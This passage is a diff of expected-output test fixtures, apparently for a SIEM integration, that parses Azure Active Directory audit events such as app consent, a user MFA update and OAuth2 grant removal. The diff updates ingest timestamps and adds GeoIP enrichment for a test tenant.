"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -6534,9 +6954,6 @@ } }, { - "tags": [ - "preserve_original_event" - ], "o365": { "audit": { "AzureActiveDirectoryEventType": "1", @@ -6672,7 +7089,7 @@ }, "client": {}, "event": { - "ingested": "2021-12-09T13:41:51.125033900Z", + "ingested": "2021-12-14T14:48:43.176659423Z", "original": "{\"Actor\":[{\"ID\":\"fim_password_service@support.onmicrosoft.com\",\"Type\":5},{\"ID\":\"100300008060F582\",\"Type\":3},{\"ID\":\"User_00000000-0000-0000-0000-000000000000\",\"Type\":2},{\"ID\":\"00000000-0000-0000-0000-000000000000\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"d51ef8df-6617-4356-b8d4-89ad7efef31e\",\"ActorIpAddress\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"\",\"CreationTime\":\"2020-02-10T15:15:04\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"d51ef8df-6617-4356-b8d4-89ad7efef31e\"},{\"Name\":\"actorObjectId\",\"Value\":\"00000000-0000-0000-0000-000000000000\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"fim_password_service@support.onmicrosoft.com\"},{\"Name\":\"actorPUID\",\"Value\":\"100300008060F582\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"targetPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"StrongAuthenticationPhoneAppDetail\\\",\\\"TargetId.UserType\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"4aa56c6c-8fa5-4787-a165-03f181541438\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"UserType\\\":\\\"Member\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:15:04.2043419Z\"},{\"Name\":\"env_epoch\",\"Value\":\"4QPHR\"},{\"Name\":\"env_seqNum\",\"Value\":\"87075075\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##00000000-0000-0000-0000-000000000000_00000000-0000-0000-0000-000000000000_00000000-0000-0000-0000-000000000000\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"becwebservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"becwebservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RBWSR554\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"83c924c1-f2e2-4b39-8eda-b80c3823a875\",\"ModifiedProperties\":[{\"Name\":\"StrongAuthenticationPhoneAppDetail\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"DeviceName\\\": \\\"NO_DEVICE\\\",\\r\\n \\\"DeviceToken\\\": \\\"NO_DEVICE_TOKEN\\\",\\r\\n \\\"DeviceTag\\\": \\\"SoftwareTokenActivated\\\",\\r\\n \\\"PhoneAppVersion\\\": \\\"NO_PHONE_APP_VERSION\\\",\\r\\n \\\"OathTokenTimeDrift\\\": -1,\\r\\n \\\"DeviceId\\\": null,\\r\\n \\\"Id\\\": \\\"3b539b10-3846-4f9b-877d-55b0b8e76147\\\",\\r\\n \\\"TimeInterval\\\": null,\\r\\n \\\"AuthenticationType\\\": 2,\\r\\n \\\"NotificationType\\\": 1,\\r\\n \\\"SecuredPartitionId\\\": 0,\\r\\n \\\"SecuredKeyId\\\": 0\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"DeviceName\\\": \\\"NO_DEVICE\\\",\\r\\n \\\"DeviceToken\\\": \\\"NO_DEVICE_TOKEN\\\",\\r\\n \\\"DeviceTag\\\": \\\"SoftwareTokenActivated\\\",\\r\\n \\\"PhoneAppVersion\\\": \\\"NO_PHONE_APP_VERSION\\\",\\r\\n \\\"OathTokenTimeDrift\\\": 0,\\r\\n \\\"DeviceId\\\": null,\\r\\n \\\"Id\\\": \\\"3b539b10-3846-4f9b-877d-55b0b8e76147\\\",\\r\\n \\\"TimeInterval\\\": null,\\r\\n \\\"AuthenticationType\\\": 2,\\r\\n \\\"NotificationType\\\": 1,\\r\\n \\\"SecuredPartitionId\\\": 0,\\r\\n \\\"SecuredKeyId\\\": 0\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"StrongAuthenticationPhoneAppDetail\",\"OldValue\":\"\"},{\"Name\":\"TargetId.UserType\",\"NewValue\":\"Member\",\"OldValue\":\"\"}],\"ObjectId\":\"asr@testsiem.onmicrosoft.com\",\"Operation\":\"Update user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"fim_password_service@support.onmicrosoft.com\",\"UserKey\":\"100300008060F582@support.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -6701,10 +7118,25 @@ "email": "asr@testsiem.onmicrosoft.com", "domain": "testsiem.onmicrosoft.com" } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -6871,7 +7303,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125038400Z", + "ingested": "2021-12-14T14:48:43.176660134Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -6898,6 +7330,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -7064,7 +7508,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125042900Z", + "ingested": "2021-12-14T14:48:43.176660814Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -7091,6 +7535,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -7257,7 +7713,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125048500Z", + "ingested": "2021-12-14T14:48:43.176661522Z", "original": 